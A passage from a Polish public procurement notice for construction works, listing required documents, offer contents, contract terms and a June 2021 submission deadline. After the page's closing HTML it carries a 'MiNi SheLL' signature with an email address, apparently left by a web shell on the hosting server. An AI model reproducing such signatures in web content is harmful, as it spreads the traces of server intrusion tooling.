Zakładu Ubezpieczeń Społecznych lub<br/>właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia<br/>Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia<br/>społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 Pzp, wystawionego nie wcześniej niż 3 miesiące<br/>przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub<br/>zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów<br/>potwierdzających, że odpowiednio przed upływem terminu składania ofert wykonawca dokonał<br/>płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami<br/>lub zawarł wiążące porozumienie w sprawie spłat tych należności;3) odpis lub informacji z Krajowego<br/>Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art.<br/>109 ust. 1 pkt 4 Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne<br/>przepisy wymagają wpisu do rejestru lub ewidencji;• W przypadku występowania po stronie<br/>Wykonawcy podmiotu udostępniającego zasoby na potwierdzenia spełnienia warunków udziału w<br/>postępowaniu, zobowiązany do złożenia dokumentów wskazanych powyżej będzie również podmiot<br/>udostępniający zasoby.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">3. Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w<br/>postępowaniu: 1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a<br/>jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju,<br/>wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz<br/>załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz<br/>którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie<br/>jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty; wzór wykazu robót<br/>wykonanych stanowi Załącznik nr 4 do SWZ;2) wykaz osób, skierowanych przez wykonawcę do<br/>realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich uprawnień, niezbędnych do wykonania zamówipublicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami; wzór wykazu osób, skierowanych przez wykonawcę do realizacji<br/>zamówienia publicznego stanowi Załącznik nr 5 do SWZ.• Jeżeli Wykonawca ma siedzibę lub miejsce<br/>zamieszkania poza granicami Rzeczypospolitej Polskiej, zastosowanie znajdują przepisy<br/>Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy, w szczególności § 4 Rozporządzenia.• Jeżeli z uzasadnionej przyczyny<br/>wykonawca nie może złożyć wymaganych przez zamawiającego podmiotowych środków dowodowych,<br/>o których mowa w § 8 ust. 1 Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia<br/>2020 Dz. U z 2020r. poz 2415, wykonawca składa inne podmiotowe środki dowodowe, które w<br/>wystarczający sposób potwierdzają spełnianie opisanego przez zamawiającego.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych, <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 6. 6. Wykaz dokumentów składających się na ofertę: 1) formularz ofertowy – według wzoru<br/>stanowiącego Załącznik nr 1 do SWZ. W przypadku, gdy Wykonawca nie korzysta z<br/>przygotowanego przez Zamawiającego wzoru, w treści oferty należy zamieścić wszystkie<br/>informacje wymagane w formularzu ofertowym. W formularzu oferty Wykonawca zobowiązany<br/>jest podać adres skrzynki ePUAP lub email, z wykorzystaniem którego prowadzona będzie<br/>korespondencja związana z postępowaniem;2) aktualne na dzień składania ofert oświadczenie o<br/>niepodleganiu wykluczeniu i spełnianiu warunków udziału w postepowaniu, składane na<br/>podstawie art. 125 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych – wzór<br/>oświadczenia stanowi Załącznik nr 2 do SWZ. W przypadku wspólnego ubiegania się o<br/>zamówienie przez Wykonawców, oświadczenie o niepoleganiu wykluczeniu i spełnianiu<br/>warunków udziału w postepowaniu składa każdy z Wykonawców; 3) aktualne na dzień składania<br/>ofert oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postepowaniu,<br/>składane na podstawie art. 125 ust. 1 w związku z art. 125 ust. 5 ustawy z dnia 11 września<br/>2019 r. Prawo zamówień publicznych – w przypadku występowania podmiotu udostępniającego zasoby – odpowiednio wg. Załącznika nr 2 do SWZ;4) następujące przedmiotowe środki<br/>dowodowe - Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych.5) w<br/>przypadku polegania na zasobach innych podmiotów – zobowiązanie podmiotu do oddania<br/>Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia - według<br/>wzoru Załącznik nr 3 do SWZ . 6) pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę<br/>składa pełnomocnik. 7) pełnomocnictwo do reprezentowania w postępowaniu Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia i/lub zawarcia umowy w sprawie<br/>zamówienia w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia -<br/>dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia;8) w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych<br/>lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać<br/>na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane. W takim przypadku Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. Wzór oświadczenia stanowi<br/>Załącznik nr 8 do SWZ.7. Zamawiający żąda wskazania przez Wykonawcę, w ofercie, części<br/>zamówienia, których wykonanie zamierza powierzyć podwykonawcom, oraz podania nazw<br/>ewentualnych podwykonawców, jeżeli są już znani. 8. Wszelkie informacje stanowiące tajemnicę<br/>przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej<br/>konkurencji (tj. Dz. U. z 2019 r., poz. 1010 ze zm.), które Wykonawca zastrzeże jako tajemnicę<br/>przedsiębiorstwa, powinny zostać złożone w osobnym pliku wraz z jednoczesnym zaznaczeniem<br/>„Załącznik stanowiący tajemnicę przedsiębiorstwa” a następnie wraz z plikami stanowiącymi<br/>jawną część skompresowane do jednego pliku archiwum (ZIP). Wykonawca zobowiązany jest,<br/>wraz z przekazaniem tych informacji, wykazać spełnienie przesłanek określonych w art. 11 ust. 2<br/>ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji. Zaleca się, aby<br/>uzasadnienie zastrzeżenia informacji jako tajemnicy przedsiębiorstwa było sformułowane w<br/>sposób umożliwiający jego udostępnienie. Zastrzeżenie przez Wykonawcę tajemnicy<br/>przedsiębiorstwa bez uzasadnienia, będzie traktowane przez Zamawiającego jako bezskuteczne<br/>ze względu na zaniechanie przez Wykonawcę podjęcia niezbędnych działań w celu zachowania<br/>poufności objętych klauzulą informacji zgodnie z postanowieniami art. 18 ust. 3 Ustawy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Pełnomocnictwo do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia i/lub zawarcia umowy w sprawie zamówienia w imieniu<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych<br/>przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia;2. W odniesieniu do<br/>warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z<br/>wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są<br/>wymagane. W takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi<br/>wykonają poszczególni Wykonawcy. Wzór oświadczenia stanowi Załącznik nr 8 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy w sprawie zamówienia publicznego wraz z wymaganiami<br/>dotyczącymi umowy o podwykonawstwo zawarto w Załączniku nr 7 do SWZ – wzór umowy. 2.<br/>Zamawiający wymaga, aby Wykonawca zawarł z nim umowę zgodną z załączonym do<br/>specyfikacji wzorem i na warunkach w tym wzorze określonych.3. Zamawiający przewiduje<br/>możliwość dokonania istotnych zmian umowy w stosunku do treści oferty, na podstawie której<br/>dokonano wyboru Wykonawcy, zgodnie z Wzorem umowy i Ustawą.4. Wykonawca ma<br/>obowiązek udokumentować zaistniałe okoliczności powodujące zmianę umowy.5. Przewidzenie<br/>przez Zamawiającego możliwości wprowadzenia istotnych zmian do zawartej umowy nie<br/>przesądza o obligatoryjności ich dokonania. Wystąpienie przesłanek zmiany umowy będzie<br/>każdorazowo podlegało szczegółowej analizie, po dokonaniu której zostanie podjęta decyzja, co<br/>do ewentualnego wprowadzenia zmiany w treści umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-25 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia oferty dostępnego na ePUAP i udostępnionego również na miniPortalu. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla Wykonawców na miniPortalu. Sposób złożenia oferty, w tym zaszyfrowania oferty opisany został w „Instrukcji użytkownika”, dostępnej na stronie: https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-25 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-10 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com